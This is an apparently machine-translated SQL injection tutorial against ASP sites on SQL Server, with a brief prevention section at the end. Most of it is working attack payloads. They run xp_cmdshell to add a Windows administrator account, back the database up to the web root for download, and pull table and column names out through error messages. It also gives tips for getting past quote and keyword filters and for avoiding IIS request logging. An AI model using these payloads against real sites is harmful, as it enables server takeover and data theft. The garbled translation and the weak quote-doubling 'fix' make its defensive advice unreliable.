Advanced Articles
After reading the introductory and advanced chapter, a little practice, crack the general website is no problem. But if you hit the list name, or the program author filters some special characters, how to improve the success rate of injection? How to improve the efficiency of guessing? Please keep looking at the advanced article.
Section one, using system tables to inject SQL Server databases
SQL Server is a powerful database system, and the operating system is also closely linked, which gives developers a great convenience, but on the other hand, also provides a springboard for the injector, we first look at a few specific examples:
①http://site/url.asp?id=1;exec Master. xp_cmdshell "NET user name Password/add"--
semicolon; In SQL Server, the two-and-right statements are represented--the following statements are comments, so this statement is divided into two sentences in SQL Server, first select the Id=1 record, and then execute the stored procedure xp_cmdshell, This stored procedure is used to invoke system commands, so the net command creates a new account for Windows with user name name, password password, and then:
②http://site/url.asp?id=1;exec Master. xp_cmdshell "net localgroup name Administrators/add"--
Add the new account name to the Administrators group, and you will have the highest privileges in the system without two minutes! Of course, this method only applies if the database is connected with an SA, otherwise there is no permission to invoke xp_cmdshell.
③http://site/url.asp?id=1 and db_name () >0
There is a similar example and user>0, which is to get the connection user name, Db_name () is another system variable, and returns the database name of the connection.
④http://site/url.asp?id=1;backup database name to disk= ' c:\inetpub\wwwroot\1.db ';--
This is quite a trick, from ③ to get the database name, plus some IIS error exposed the absolute path, the database back to the Web directory, and then the entire database with HTTP to complete the download back, all the admin and user password are glance! When you do not know the absolute path, you can also back up to the network address of the method (such as \\202.96.xx.xx\Share \1.db), but the success rate is not high.
⑤http://site/url.asp?id=1 and (Select top 1 name from sysobjects where xtype= ' U ' and status>0) >0
As mentioned earlier, sysobjects is a SQL Server system table that stores all the table names, views, constraints, and other objects, xtype= ' U ' and status>0, the name of the table that the user creates, and the above statement takes the first table name out and compares it to 0. Let the error message expose the table name. Second, the third table name how to get? or leave it to our smart readers to think about it.
⑥http://site/url.asp?id=1 and (Select top 1 col_name (object_id (' table name '), 1) from sysobjects) >0
After you get the table name from ⑤, use object_id (' table name ') to get the internal id,col_name (table name id,1) of the table name to represent the 1th field name of the table, and replace 1 with 2,3,4 ... you can get the name of the field in the puzzle sheet one by one.
The above 6 points is that I study SQL Server injection more than six months since the painstaking crystallization, you can see that the understanding of SQL Server, directly affect the success rate and guess the speed of the solution. After I studied SQL Server injection, my level in development has also been greatly improved, oh, maybe Security and development is complementary to it.
Section II, bypass program restrictions continue to inject
In the introductory article, there are many people who like to use the ' number test ' to inject holes, so there are also a lot of people using the filter ' number ' method to "prevent" injection vulnerabilities, which may be able to block some beginners attack, but the SQL injection more familiar people, or can use the relevant functions, to circumvent the program restrictions.
In the "General Steps for SQL Injection" section, the statements I use are optimized so that they do not contain single quotes; in the "inject SQL Server database with system tables," some statements contain ' numbers ', and let's take an example to see how these statements are modified:
Simple as where xtype= ' U ', the character U corresponds to the ASCII code is 85, so you can use where Xtype=char (85) Instead, if the character is in Chinese, such as where name= ' user ', you can use where Name=nchar ( 29992) +nchar (25143) instead.
Section III, Summary of experience
1. Some people will filter the SELECT, Update, delete these keywords, but forget the case is case-sensitive, so you can use Select to try this.
2. If you can't guess the field name, look at the login form on the Web site, generally for convenience, the field name and form of the input box to take the same names.
3. Special note: The Address bar of the + code after the introduction of the program is interpreted as a space,%2b interpreted as the + number,%25 interpreted as%, specific reference to the UrlEncode of the relevant introduction.
4. When injected with the Get method, IIS records all of your commit strings and does not record the Post method, so you can use the Post URL as much as possible without the get.
5. The interpretation of Access can only use ASCII verbatim decoding method, SQL Server can also use this method, only need the difference between the two, but if you can use SQL Server error information to expose the value, that efficiency and accuracy rate will be greatly improved.
Prevention methods
SQL injection vulnerabilities can be described as "sink, Shan", which is very common on the web, usually because programmers don't understand the injection, or if the program is not filtered strictly, or if a parameter forgets to be checked. Here, I give you a function, instead of the request function in ASP, you can inject say NO to all SQL, the function is as follows:
Function Saferequest (Paraname,paratype)
'---incoming parameters---
' Paraname: Parameter name-character type
' Paratype: Parameter Type-numeric (1 indicates that the above parameter is a number, and 0 indicates that the above parameter is a character)
Dim Paravalue
Paravalue=request (Paraname)
If Paratype=1 Then
If not IsNumeric (paravalue) Then
Response.Write "Parameter" & Paraname & must be a numeric type! "
Response.End
End If
Else
Paravalue=replace (Paravalue, "'", "" ")
End If
Saferequest=paravalue
End Function
This is the end of the article, whether you are a security person, a technology enthusiast or a programmer, I hope this article will help you.
